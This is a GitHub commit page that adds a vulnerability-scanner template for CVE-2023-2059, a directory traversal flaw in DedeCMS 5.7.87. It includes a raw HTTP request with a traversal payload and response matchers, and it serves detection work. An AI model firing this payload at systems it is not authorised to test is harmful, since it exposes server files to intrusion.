Skip to content

Commit

Permalink
Create CVE-2023-2059.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
pussycat0x committed May 25, 2024
1 parent 9afec19 commit 147d7c5
Showing 1 changed file with 44 additions and 0 deletions.
44 changes: 44 additions & 0 deletions http/cves/2023/CVE-2023-2059.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
id: CVE-2023-2059

info:
name: DedeCMS 5.7.87 - Directory Traversal Vulnerability
author: pussycat0x
severity: medium
description: |
Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.
reference:
- https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md
- https://vuldb.com/?ctiid.225944
- https://vuldb.com/?id.225944
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-2059
cwe-id: CWE-28
epss-score: 0.00107
epss-percentile: 0.42813
cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:*
metadata:
vendor: dedecms
product: dedecms
fofa-query: app="DedeCMS"
tags: cve,cve2023,dedecms

Check failure on line 25 in http/cves/2023/CVE-2023-2059.yaml

View workflow job for this annotation

GitHub Actions / build

25:28 [trailing-spaces] trailing spaces

http:
- raw:
- |
GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "dirname(__FILE__)"
- "$cfg_basedir"
condition: and

Check failure on line 41 in http/cves/2023/CVE-2023-2059.yaml

View workflow job for this annotation

GitHub Actions / build

41:1 [trailing-spaces] trailing spaces
- type: status
status:
- 200

0 comments on commit 147d7c5

Please sign in to comment.